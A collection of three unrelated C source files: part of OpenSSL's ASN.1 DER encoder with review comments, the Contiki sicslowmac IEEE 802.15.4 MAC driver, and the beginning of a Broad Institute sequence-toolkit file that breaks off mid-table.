iclass); if (ndef == 2) ASN1_put_eoc(out); } return ret; } /* Either normal or IMPLICIT tagging: combine class and flags */ return ASN1_item_ex_i2d(pval, out, ASN1_ITEM_ptr(tt->item), ttag, tclass | iclass); } /* Temporary structure used to hold DER encoding of items for SET OF */ typedef struct { unsigned char *data; int length; ASN1_VALUE *field; } DER_ENC; static int der_cmp(const void *a, const void *b) { 
const DER_ENC *d1 = a, *d2 = b;
    int cmplen, i;
    /* Compare the common prefix first; ties are broken by length.
     * This yields the lexicographic ordering DER requires for SET OF. */
    cmplen = (d1->length < d2->length) ? d1->length : d2->length;
    i = memcmp(d1->data, d2->data, cmplen);
    if (i)
        return i;
    return d1->length - d2->length;
}

/* Output the content octets of SET OF or SEQUENCE OF */
static int asn1_set_seq_out(STACK_OF(ASN1_VALUE) *sk, unsigned char **out,
                            int skcontlen, const ASN1_ITEM *item,
                            int do_sort, int iclass)
{
    int i;
    ASN1_VALUE *skitem;
    unsigned char *tmpdat = NULL, *p = NULL;
    DER_ENC *derlst = NULL, *tder;

    if (do_sort) {
        /* Don't need to sort less than 2 items */
        if (sk_ASN1_VALUE_num(sk) < 2)
            do_sort = 0;
        else {
            /* One DER_ENC descriptor per stack member... */
            derlst = OPENSSL_malloc(sk_ASN1_VALUE_num(sk)
                                    * sizeof(*derlst));
            if (derlst == NULL)
                return 0;
            /* ...plus a scratch buffer holding all member encodings
             * back-to-back; skcontlen is the caller-computed total. */
            tmpdat = OPENSSL_malloc(skcontlen);
            if (tmpdat == NULL) {
                OPENSSL_free(derlst);
                return 0;
            }
        }
    }
    /* If not sorting just output each item */
    if (!do_sort) {
        for (i = 0; i < sk_ASN1_VALUE_num(sk); i++) {
            skitem = sk_ASN1_VALUE_value(sk, i);
            ASN1_item_ex_i2d(&skitem, out, item, -1, iclass);
        }
        return 1;
    }
    p = tmpdat;
    /* Doing sort: build up a list of each member's DER encoding */
    for (i = 0, tder = derlst; i < sk_ASN1_VALUE_num(sk); i++, tder++) {
        skitem = sk_ASN1_VALUE_value(sk, i);
        tder->data = p;
        /* NOTE(review): the return value is stored unchecked; a negative
         * length here would corrupt the sort/copy below — TODO confirm
         * callers guarantee every member is encodable at this point. */
        tder->length = ASN1_item_ex_i2d(&skitem, &p, item, -1, iclass);
        tder->field = skitem;
    }
    /* Now sort them */
    qsort(derlst, sk_ASN1_VALUE_num(sk), sizeof(*derlst), der_cmp);
    /* Output sorted DER encoding */
    p = *out;
    for (i = 0, tder = derlst; i < sk_ASN1_VALUE_num(sk); i++, tder++) {
        memcpy(p, tder->data, tder->length);
        p += tder->length;
    }
    *out = p;
    /* If do_sort is 2 then reorder the STACK */
    if (do_sort == 2) {
        for (i = 0, tder = derlst; i < sk_ASN1_VALUE_num(sk); i++, tder++)
            (void)sk_ASN1_VALUE_set(sk, i, tder->field);
    }
    OPENSSL_free(derlst);
    OPENSSL_free(tmpdat);
    return 1;
}

/* Encode a primitive (or MSTRING/ANY) item: emit tag+length followed by
 * the content octets produced by asn1_ex_i2c(), unless the pseudo content
 * (SEQUENCE/SET/OTHER) already carries its own header. */
static int asn1_i2d_ex_primitive(ASN1_VALUE **pval, unsigned char **out,
                                 const ASN1_ITEM *it, int tag, int aclass)
{
    int len;
    int utype;
    int usetag;
    int ndef = 0;

    utype = it->utype;

    /*
     * Get length of content
octets and maybe find out the underlying type. */ len = asn1_ex_i2c(pval, NULL, &utype, it); /* * If SEQUENCE, SET or OTHER then header is included in pseudo content * octets so don't include tag+length. We need to check here because the * call to asn1_ex_i2c() could change utype. */ if ((utype == V_ASN1_SEQUENCE) || (utype == V_ASN1_SET) || (utype == V_ASN1_OTHER)) usetag = 0; else usetag = 1; /* -1 means omit type */ if (len == -1) return 0; /* -2 return is special meaning use ndef */ if (len == -2) { ndef = 2; len = 0; } /* If not implicitly tagged get tag from underlying type */ if (tag == -1) tag = utype; /* Output tag+length followed by content octets */ if (out) { if (usetag) ASN1_put_object(out, ndef, len, tag, aclass); asn1_ex_i2c(pval, *out, &utype, it); if (ndef) ASN1_put_eoc(out); else *out += len; } if (usetag) return ASN1_object_size(ndef, len, tag); return len; } /* Produce content octets from a structure */ static int asn1_ex_i2c(ASN1_VALUE **pval, unsigned char *cout, int *putype, const ASN1_ITEM *it) { ASN1_BOOLEAN *tbool = NULL; ASN1_STRING *strtmp; ASN1_OBJECT *otmp; int utype; const unsigned char *cont; unsigned char c; int len; const ASN1_PRIMITIVE_FUNCS *pf; pf = it->funcs; if (pf && pf->prim_i2c) return pf->prim_i2c(pval, cout, putype, it); /* Should type be omitted? 
*/ if ((it->itype != ASN1_ITYPE_PRIMITIVE) || (it->utype != V_ASN1_BOOLEAN)) { if (!*pval) return -1; } if (it->itype == ASN1_ITYPE_MSTRING) { /* If MSTRING type set the underlying type */ strtmp = (ASN1_STRING *)*pval; utype = strtmp->type; *putype = utype; } else if (it->utype == V_ASN1_ANY) { /* If ANY set type and pointer to value */ ASN1_TYPE *typ; typ = (ASN1_TYPE *)*pval; utype = typ->type; *putype = utype; pval = &typ->value.asn1_value; } else utype = *putype; switch (utype) { case V_ASN1_OBJECT: otmp = (ASN1_OBJECT *)*pval; cont = otmp->data; len = otmp->length; if (cont == NULL || len == 0) return -1; break; case V_ASN1_NULL: cont = NULL; len = 0; break; case V_ASN1_BOOLEAN: tbool = (ASN1_BOOLEAN *)pval; if (*tbool == -1) return -1; if (it->utype != V_ASN1_ANY) { /* * Default handling if value == size field then omit */ if (*tbool && (it->size > 0)) return -1; if (!*tbool && !it->size) return -1; } c = (unsigned char)*tbool; cont = &c; len = 1; break; case V_ASN1_BIT_STRING: return i2c_ASN1_BIT_STRING((ASN1_BIT_STRING *)*pval, cout ? &cout : NULL); case V_ASN1_INTEGER: case V_ASN1_ENUMERATED: /* * These are all have the same content format as ASN1_INTEGER */ return i2c_ASN1_INTEGER((ASN1_INTEGER *)*pval, cout ? 
&cout : NULL); case V_ASN1_OCTET_STRING: case V_ASN1_NUMERICSTRING: case V_ASN1_PRINTABLESTRING: case V_ASN1_T61STRING: case V_ASN1_VIDEOTEXSTRING: case V_ASN1_IA5STRING: case V_ASN1_UTCTIME: case V_ASN1_GENERALIZEDTIME: case V_ASN1_GRAPHICSTRING: case V_ASN1_VISIBLESTRING: case V_ASN1_GENERALSTRING: case V_ASN1_UNIVERSALSTRING: case V_ASN1_BMPSTRING: case V_ASN1_UTF8STRING: case V_ASN1_SEQUENCE: case V_ASN1_SET: default: /* All based on ASN1_STRING and handled the same */ strtmp = (ASN1_STRING *)*pval; /* Special handling for NDEF */ if ((it->size == ASN1_TFLG_NDEF) && (strtmp->flags & ASN1_STRING_FLAG_NDEF)) { if (cout) { strtmp->data = cout; strtmp->length = 0; } /* Special return code */ return -2; } cont = strtmp->data; len = strtmp->length; break; } if (cout && len) memcpy(cout, cont, len); return len; }
{ "language": "C" }
/* * Copyright (c) 2008, Swedish Institute of Computer Science. * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. Neither the name of the Institute nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE INSTITUTE AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE INSTITUTE OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * This file is part of the Contiki operating system. 
* */ /** * \file * Example glue code between the existing MAC code and the * Contiki mac interface * * \author * Adam Dunkels <adam@sics.se> * Eric Gnoske <egnoske@gmail.com> * Blake Leverett <bleverett@gmail.com> * * \addtogroup rf230mac */ #include <stdlib.h> #include <stdbool.h> #include <string.h> #include <stdio.h> #include <avr/eeprom.h> #include <util/delay.h> #include "net/packetbuf.h" #include "zmac.h" #include "mac.h" #include "frame.h" #include "radio.h" #include "tcpip.h" #include "sicslowmac.h" #include "sicslowpan.h" #include "ieee-15-4-manager.h" /* Macros */ #define DEBUG 0 #define MAX_EVENTS 10 #if DEBUG #define PRINTF(...) printf(__VA_ARGS__) #define SICSLOW_CORRECTION_DELAY 70 #else #define PRINTF(...) #define SICSLOW_CORRECTION_DELAY 7 #endif #ifdef JACKDAW #include "sicslow_ethernet.h" #define LOG_FRAME(x,y) mac_logTXtoEthernet(x,y) #else #define LOG_FRAME(x,y) #endif /* Globals */ static struct mac_driver mac_driver_struct; static struct mac_driver *pmac_driver = &mac_driver_struct; extern ieee_15_4_manager_t ieee15_4ManagerAddress; static parsed_frame_t *parsed_frame; /* The core mac layer has a pointer to the driver name in the first field. * It calls the radio driver with radio->send, which is the first field of the radio driver. * This glue directs radio->send to the custom mac layer. */ const struct mac_driver sicslowmac_driver = { (char *)sicslowmac_dataRequest, //Remove compiler warning. /* read_packet, */ /* set_receive_function, */ /* on, */ /* off, */ }; static struct { uint8_t head; uint8_t tail; event_object_t event_object[MAX_EVENTS]; } event_queue; /* Prototypes */ static void setinput(void (*r)(const struct mac_driver *d)); void (*pinput)(const struct mac_driver *r); void sicslowmac_unknownIndication(void); void (*sicslowmac_snifferhook)(const struct mac_driver *r) = NULL; /*---------------------------------------------------------------------------*/ /** * \brief Checks for any pending events in the queue. 
* * \return True if there is a pending event, else false. */ uint8_t mac_event_pending(void) { return (event_queue.head != event_queue.tail); } /*---------------------------------------------------------------------------*/ /** * \brief Puts an event into the queue of events. * * \param object is a pointer to the event to add to queue. */ void mac_put_event(event_object_t *object) { uint8_t newhead; if ((event_queue.head + 1) % MAX_EVENTS == event_queue.tail){ /* queue full, get outta here */ return; } newhead = event_queue.head; /* store in queue */ event_queue.event_object[newhead] = *object; /* calculate new head index */ newhead++; if (newhead >= MAX_EVENTS){ newhead = 0; } event_queue.head = newhead; } /*---------------------------------------------------------------------------*/ /** * \brief Pulls an event from the event queue. * Assumes that there is an event in the queue. See mac_event_pending(). * * \return Pointer to the event object, or NULL in the event of empty queue. */ event_object_t *mac_get_event(void) { event_object_t *object = NULL; volatile uint8_t newtail; newtail = event_queue.tail; object = &(event_queue.event_object[newtail]); /* calculate new tail */ newtail++; if (newtail >= MAX_EVENTS){ newtail = 0; } event_queue.tail = newtail; return(object); } void mac_pollhandler(void) { mac_task(0, NULL); } /*---------------------------------------------------------------------------*/ /** * \brief This is the main loop task for the MAC. Called by the * main application loop. 
*/ void mac_task(process_event_t ev, process_data_t data) { /* check for event in queue */ event_object_t *event; if(mac_event_pending()){ event = mac_get_event(); /* Handle events from radio */ if (event){ if (event->event == MAC_EVENT_RX){ /* got a frame, find out with kind of frame */ parsed_frame = (parsed_frame_t *)event->data; if (parsed_frame->fcf->frameType == DATAFRAME){ sicslowmac_dataIndication(); } else { /* Hook to cath unknown frames */ sicslowmac_unknownIndication(); } /* Frame no longer in use */ parsed_frame->in_use = false; } if (event->event == MAC_EVENT_DROPPED){ /* Frame was dropped */ PRINTF("sicslowmac: Frame Dropped!\n"); } } } } /*---------------------------------------------------------------------------*/ void setinput(void (*r)(const struct mac_driver *d)) { pinput = r; } /*---------------------------------------------------------------------------*/ static uint8_t dest_reversed[UIP_LLADDR_LEN]; static uint8_t src_reversed[UIP_LLADDR_LEN]; # define MSB(u16) (((uint8_t* )&u16)[1]) # define LSB(u16) (((uint8_t* )&u16)[0]) void sicslowmac_dataIndication(void) { packetbuf_clear(); #if UIP_LLADDR_LEN == 8 /* Finally, get the stuff into the rime buffer.... */ packetbuf_copyfrom(parsed_frame->payload, parsed_frame->payload_length); packetbuf_set_datalen(parsed_frame->payload_length); memcpy(dest_reversed, (uint8_t *)parsed_frame->dest_addr, UIP_LLADDR_LEN); memcpy(src_reversed, (uint8_t *)parsed_frame->src_addr, UIP_LLADDR_LEN); /* Change addresses to expected byte order */ byte_reverse((uint8_t *)dest_reversed, UIP_LLADDR_LEN); byte_reverse((uint8_t *)src_reversed, UIP_LLADDR_LEN); packetbuf_set_addr(PACKETBUF_ADDR_RECEIVER, (const linkaddr_t *)dest_reversed); packetbuf_set_addr(PACKETBUF_ADDR_SENDER, (const linkaddr_t *)src_reversed); #elif UIP_CONF_USE_RUM /* Finally, get the stuff into the rime buffer.... 
*/ packetbuf_copyfrom(parsed_frame->payload + UIP_DATA_RUM_OFFSET, parsed_frame->payload_length - UIP_DATA_RUM_OFFSET); packetbuf_set_datalen(parsed_frame->payload_length + UIP_DATA_RUM_OFFSET); dest_reversed[0] = MSB(parsed_frame->dest_pid); dest_reversed[1] = LSB(parsed_frame->dest_pid); dest_reversed[2] = 0; dest_reversed[3] = 0; dest_reversed[4] = MSB(parsed_frame->payload[0]); //FinalDestAddr dest_reversed[5] = LSB(parsed_frame->payload[1]); src_reversed[0] = MSB(parsed_frame->src_pid); src_reversed[1] = LSB(parsed_frame->src_pid); src_reversed[2] = 0; src_reversed[3] = 0; src_reversed[4] = MSB(parsed_frame->payload[2]); //originAddr src_reversed[5] = LSB(parsed_frame->payload[3]); #else /* Finally, get the stuff into the rime buffer.... */ packetbuf_copyfrom(parsed_frame->payload, parsed_frame->payload_length); packetbuf_set_datalen(parsed_frame->payload_length); dest_reversed[0] = MSB(parsed_frame->dest_pid); dest_reversed[1] = LSB(parsed_frame->dest_pid); dest_reversed[2] = 0; dest_reversed[3] = 0; dest_reversed[4] = MSB(parsed_frame->dest_addr->addr16); dest_reversed[5] = LSB(parsed_frame->dest_addr->addr16); src_reversed[0] = MSB(parsed_frame->src_pid); src_reversed[1] = LSB(parsed_frame->src_pid); src_reversed[2] = 0; src_reversed[3] = 0; src_reversed[4] = MSB(parsed_frame->src_addr->addr16); src_reversed[5] = LSB(parsed_frame->src_addr->addr16); packetbuf_set_addr(PACKETBUF_ADDR_RECEIVER, (const linkaddr_t *)dest_reversed); packetbuf_set_addr(PACKETBUF_ADDR_SENDER, (const linkaddr_t *)src_reversed); #endif PRINTF("sicslowmac: hand off frame to sicslowpan \n"); pinput(pmac_driver); } void sicslowmac_unknownIndication(void) { if (sicslowmac_snifferhook) { packetbuf_clear(); /* Finally, get the stuff into the rime buffer.... 
*/ packetbuf_copyfrom(parsed_frame->payload, parsed_frame->payload_length); packetbuf_set_datalen(parsed_frame->payload_length); #if UIP_LLADDR_LEN == 8 memcpy(dest_reversed, (uint8_t *)parsed_frame->dest_addr, UIP_LLADDR_LEN); memcpy(src_reversed, (uint8_t *)parsed_frame->src_addr, UIP_LLADDR_LEN); /* Change addresses to expected byte order */ byte_reverse((uint8_t *)dest_reversed, UIP_LLADDR_LEN); byte_reverse((uint8_t *)src_reversed, UIP_LLADDR_LEN); packetbuf_set_addr(PACKETBUF_ADDR_RECEIVER, (const linkaddr_t *)dest_reversed); packetbuf_set_addr(PACKETBUF_ADDR_SENDER, (const linkaddr_t *)src_reversed); #elif UIP_CONF_USE_RUM dest_reversed[0] = MSB(parsed_frame->dest_pid); dest_reversed[1] = LSB(parsed_frame->dest_pid); dest_reversed[2] = 0; dest_reversed[3] = 0; dest_reversed[4] = MSB(parsed_frame->payload[0]); //FinalDestAddr dest_reversed[5] = LSB(parsed_frame->payload[1]); src_reversed[0] = MSB(parsed_frame->src_pid); src_reversed[1] = LSB(parsed_frame->src_pid); src_reversed[2] = 0; src_reversed[3] = 0; src_reversed[4] = MSB(parsed_frame->payload[2]); //originAddr src_reversed[5] = LSB(parsed_frame->payload[3]); #else dest_reversed[0] = MSB(parsed_frame->dest_pid); dest_reversed[1] = LSB(parsed_frame->dest_pid); dest_reversed[2] = 0; dest_reversed[3] = 0; dest_reversed[4] = MSB(parsed_frame->dest_addr->addr16); dest_reversed[5] = LSB(parsed_frame->dest_addr->addr16); src_reversed[0] = MSB(parsed_frame->src_pid); src_reversed[1] = LSB(parsed_frame->src_pid); src_reversed[2] = 0; src_reversed[3] = 0; src_reversed[4] = MSB(parsed_frame->src_addr->addr16); src_reversed[5] = LSB(parsed_frame->src_addr->addr16); packetbuf_set_addr(PACKETBUF_ADDR_RECEIVER, (const linkaddr_t *)dest_reversed); packetbuf_set_addr(PACKETBUF_ADDR_SENDER, (const linkaddr_t *)src_reversed); #endif PRINTF("sicslowmac: hand off frame to sniffer \n"); sicslowmac_snifferhook(pmac_driver); } } /*---------------------------------------------------------------------------*/ /** * \brief This 
is the implementation of the 15.4 MAC Data Request * primitive. * * \return Integer denoting success or failure. * \retval 0 Failure. * \retval 1 Success. * * The data request primitive creates the frame header based * on static and dynamic data. The static data will be refined * in phase II of the project. The frame payload and length are * retrieved from the rime buffer and rime length respectively. * * When the header and payload are assembled into the * frame_create_params structure, the frame is created * by a call to frame_tx_create and then transmited via * radio_send_data. */ /*---------------------------------------------------------------------------*/ int sicslowmac_dataRequest(void) { _delay_ms(SICSLOW_CORRECTION_DELAY); /* create structure to store result. */ frame_create_params_t params; frame_result_t result; #if NETSTACK_CONF_WITH_RIME /* Save the msduHandle in a global variable. */ msduHandle = packetbuf_attr(PACKETBUF_ATTR_PACKET_ID); #endif /* Build the FCF. */ params.fcf.frameType = DATAFRAME; params.fcf.securityEnabled = false; params.fcf.framePending = false; #if NETSTACK_CONF_WITH_RIME params.fcf.ackRequired = packetbuf_attr(PACKETBUF_ATTR_RELIABLE); #endif params.fcf.panIdCompression = false; /* Insert IEEE 802.15.4 (2003) version bit. */ params.fcf.frameVersion = IEEE802154_2003; /* Increment and set the data sequence number. */ params.seq = macDSN++; /* Complete the addressing fields. */ /** \todo For phase 1 the addresses are all long. We'll need a mechanism in the rime attributes to tell the mac to use long or short for phase 2. */ params.fcf.srcAddrMode = LONGADDRMODE; params.dest_pid = ieee15_4ManagerAddress.get_dst_panid(); if(packetbuf_holds_broadcast()) { /* Broadcast requires short address mode. */ params.fcf.destAddrMode = SHORTADDRMODE; params.dest_pid = BROADCASTPANDID; params.dest_addr.addr16 = BROADCASTADDR; } else { /* Phase 1.5 - end nodes send to anyone? 
*/
	/* NOTE(review): tail of a transmit routine whose head lies before this
	 * chunk; it fills an 802.15.4 frame descriptor `params` from the Contiki
	 * packetbuf and hands the encoded frame to the radio.  Only comments are
	 * added in this span — the code is unchanged. */
	memcpy(&params.dest_addr, (uint8_t *)packetbuf_addr(PACKETBUF_ADDR_RECEIVER), LONG_ADDR_LEN);
	/* Change from sicslowpan byte arrangement to sicslowmac */
	byte_reverse((uint8_t*)&params.dest_addr.addr64, LONG_ADDR_LEN);
	/* Phase 1 - end nodes only sends to pan coordinator node. */
	/* params.dest_addr.addr64 = ieee15_4ManagerAddress.get_coord_long_addr(); */
	params.fcf.destAddrMode = LONGADDRMODE;
  }

  /* Set the source PAN ID to the global variable. */
  params.src_pid = ieee15_4ManagerAddress.get_src_panid();

  /*
   * Set up the source address using only the long address mode for
   * phase 1.
   */
  params.src_addr.addr64 = ieee15_4ManagerAddress.get_long_addr();

  /* Copy the payload data. */
  params.payload_len = packetbuf_datalen();
  params.payload = packetbuf_dataptr();

  /* Create transmission frame. */
  frame_tx_create(&params, &result);

  /* Log if needed */
  LOG_FRAME(&params, &result);

  /* Retry up to this many times to send the packet if radio is busy */
  uint8_t retry_count = 3;

  while(retry_count) {
    PRINTF("sicslowmac: sending packet of length %d to radio, result:", result.length);

    /* Send data to radio. */
    radio_status_t rv = radio_send_data(result.length, result.frame);

    if (rv == RADIO_SUCCESS) {
      PRINTF(" Success\n");
      return 1; /* True says that the packet could be sent */
    }

    if (rv != RADIO_WRONG_STATE) {
      /* Any error other than "radio busy" is treated as fatal for this
       * packet: no further retries are attempted. */
      PRINTF(" Failed\n");
      return 0;
    }

    PRINTF(" Radio busy, retrying\n");

    /** \todo: Fix delay in sicslowmac so they do not block receiving */

    //We have blocking delay here, it is safest this way. BUT doesn't solve the
    //problem of TX when you are RXing.. as the RX code can't execute!
    /* Back-off schedule: 10 ms, 50 ms, 200 ms across the three retries. */
    if (retry_count == 3) {
      _delay_ms(10);
    } else if (retry_count == 2) {
      _delay_ms(50);
    } else if (retry_count == 1) {
      _delay_ms(200);
    }
    retry_count--;
  }

  PRINTF("sicslowmac: Unable to send packet, dropped\n");
  return 0;
}
/*---------------------------------------------------------------------------*/
/**
 * \brief Stub function that will be implemented in phase 2 to cause
 * end nodes to sleep.
 */
int
mac_wake(void)
{
  /* Always reports success; no power management is implemented yet. */
  return 1;
}
/*---------------------------------------------------------------------------*/
/**
 * \brief Stub function that will be implemented in phase 2 to cause
 * end nodes to sleep.
 */
int
mac_sleep(void)
{
  /* Always reports success; no power management is implemented yet. */
  return 1;
}
/*---------------------------------------------------------------------------*/
/*
 * Return the sicslowmac MAC driver.  The radio_driver argument is currently
 * ignored — the hookup code below is commented out, so the radio must be
 * initialised elsewhere (see the mac_process thread).
 */
const struct mac_driver *
sicslowmac_init(const struct radio_driver *d)
{
  /* AD: commented out the radio_driver code for now.*/
/*  radio = d;
  radio->set_receive_function(input_packet);
  radio->on();*/

  return &sicslowmac_driver;
}
/*---------------------------------------------------------------------------*/
/**
 * \brief This is the implementation of the 15.4 MAC Reset Request
 * primitive.
 * \param setDefaultPIB True if the default PIB values should be set.
 * \return Integer denoting success or failure.
 * \retval 0 Failure.
 * \retval 1 Success.
 *
 * Sets all PIB values to default.
 */
void
sicslowmac_resetRequest (bool setDefaultPIB)
{
  if(setDefaultPIB){
    /* initialize all of the MAC PIB variables to their default values */
    macCoordShortAddress = 0xffff;
    macDSN = rand() % 256;
    macSrcPANId = SOURCE_PAN_ID;
    macDstPANId = DEST_PAN_ID;
    macShortAddress = 0xffff;
    /* Setup the address of this device by reading a stored address from eeprom. */
    /** \todo This might be read from the serial eeprom onboard Raven. */
    /* Interrupts are masked around the EEPROM read; the stored address is
     * byte-reversed into the in-memory ordering used by this MAC. */
    AVR_ENTER_CRITICAL_REGION();
    eeprom_read_block ((void *)&macLongAddr, EEPROMMACADDRESS, 8);
    byte_reverse((uint8_t *) &macLongAddr, 8);
    AVR_LEAVE_CRITICAL_REGION();
  }
}

/* Accessor for the most recently parsed frame (module-level state). */
parsed_frame_t *
sicslowmac_get_frame(void)
{
  return parsed_frame;
}
/*---------------------------------------------------------------------------*/
/* Accessor for the MAC driver instance used by this module. */
struct mac_driver *
sicslowmac_get_driver(void)
{
  return pmac_driver;
}
/*---------------------------------------------------------------------------*/
PROCESS(mac_process, "802.15.4 MAC process");

/*
 * Contiki protothread that owns the radio: initialises it, selects the
 * channel, wires the MAC callbacks, then services MAC events forever.
 * NOTE(review): being a protothread, local variables do not survive
 * PROCESS_YIELD(); everything read after the loop starts must be re-derived
 * from ev/data or module state.
 */
PROCESS_THREAD(mac_process, ev, data)
{
  PROCESS_POLLHANDLER(mac_pollhandler());

  PROCESS_BEGIN();

  radio_status_t return_value;

  /* init radio */
  /** \todo: this screws up if calosc is set to TRUE, find out why? */
  return_value = radio_init(false, NULL, NULL, NULL);

#if DEBUG
  if (return_value == RADIO_SUCCESS) {
    printf("Radio init successful.\n");
  } else {
    printf("Radio init failed with return: %d\n", return_value);
  }
#endif

  uint8_t eeprom_channel;
  uint8_t eeprom_check;

  /* Channel is stored at EEPROM byte 9 with its one's complement at byte 10
   * as an integrity check; fall back to a build-dependent default when the
   * pair is inconsistent or out of the 802.15.4 range 11..26. */
  eeprom_channel = eeprom_read_byte((uint8_t *)9);
  eeprom_check = eeprom_read_byte((uint8_t *)10);

  if ((eeprom_channel < 11) || (eeprom_channel > 26) || ((uint8_t)eeprom_channel != (uint8_t)~eeprom_check)) {
#if UIP_CONF_USE_RUM
    eeprom_channel = 19; //Default
#else
    eeprom_channel = 24; //Default
#endif
  }

  radio_set_operating_channel(eeprom_channel);
  radio_use_auto_tx_crc(true);
  radio_set_trx_state(TRX_OFF);

  mac_init();

  /* Set up MAC function pointers and sicslowpan callback. */
  pmac_driver->set_receive_function = setinput;
  pmac_driver->send = sicslowmac_dataRequest;
  sicslowpan_init(pmac_driver);

  ieee_15_4_init(&ieee15_4ManagerAddress);

  /* Enter extended receive mode with automatic acknowledgements. */
  radio_set_trx_state(RX_AACK_ON);

  while(1) {
    PROCESS_YIELD();
    mac_task(ev, data);
  }

  PROCESS_END();
}

/*
 * In-place reversal of `num` bytes starting at `bytes`; used to convert
 * between the byte orders expected by sicslowpan and this MAC.
 */
void
byte_reverse(uint8_t * bytes, uint8_t num)
{
  uint8_t tempbyte;
  uint8_t i, j;

  i = 0;
  j = num - 1;

  /* Classic two-index swap converging from both ends. */
  while(i < j) {
    tempbyte = bytes[i];
    bytes[i] = bytes[j];
    bytes[j] = tempbyte;
    j--;
    i++;
  }

  return;
}
{ "language": "C" }
/* The MIT License Copyright (c) 2008-2016 Broad Institute Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ #include <stdio.h> #include <ctype.h> #include <stdlib.h> #include <stdint.h> #include <inttypes.h> #include <zlib.h> #include <string.h> #include <unistd.h> #include <limits.h> #include <assert.h> #include <math.h> #include "kseq.h" KSEQ_INIT(gzFile, gzread) typedef struct { int n, m; uint64_t *a; } reglist_t; #include "khash.h" KHASH_MAP_INIT_STR(reg, reglist_t) KHASH_SET_INIT_INT64(64) typedef kh_reg_t reghash_t; reghash_t *stk_reg_read(const char *fn) { reghash_t *h = kh_init(reg); gzFile fp; kstream_t *ks; int dret; kstring_t *str; // read the list fp = strcmp(fn, "-")? 
gzopen(fn, "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) return 0; ks = ks_init(fp); str = calloc(1, sizeof(kstring_t)); while (ks_getuntil(ks, 0, str, &dret) >= 0) { int beg = -1, end = -1; reglist_t *p; khint_t k = kh_get(reg, h, str->s); if (k == kh_end(h)) { int ret; char *s = strdup(str->s); k = kh_put(reg, h, s, &ret); memset(&kh_val(h, k), 0, sizeof(reglist_t)); } p = &kh_val(h, k); if (dret != '\n') { if (ks_getuntil(ks, 0, str, &dret) > 0 && isdigit(str->s[0])) { beg = atoi(str->s); if (dret != '\n') { if (ks_getuntil(ks, 0, str, &dret) > 0 && isdigit(str->s[0])) { end = atoi(str->s); if (end < 0) end = -1; } } } } // skip the rest of the line if (dret != '\n') while ((dret = ks_getc(ks)) > 0 && dret != '\n'); if (end < 0 && beg > 0) end = beg, beg = beg - 1; // if there is only one column if (beg < 0) beg = 0, end = INT_MAX; if (p->n == p->m) { p->m = p->m? p->m<<1 : 4; p->a = realloc(p->a, p->m * 8); } p->a[p->n++] = (uint64_t)beg<<32 | end; } ks_destroy(ks); gzclose(fp); free(str->s); free(str); return h; } void stk_reg_destroy(reghash_t *h) { khint_t k; if (h == 0) return; for (k = 0; k < kh_end(h); ++k) { if (kh_exist(h, k)) { free(kh_val(h, k).a); free((char*)kh_key(h, k)); } } kh_destroy(reg, h); } /* constant table */ unsigned char seq_nt16_table[256] = { 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15 /*'-'*/,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15, 1,14, 2, 13,15,15, 4, 11,15,15,12, 15, 3,15,15, 15,15, 5, 6, 8,15, 7, 9, 0,10,15,15, 15,15,15,15, 15, 1,14, 2, 13,15,15, 4, 11,15,15,12, 15, 3,15,15, 15,15, 5, 6, 8,15, 7, 9, 0,10,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 
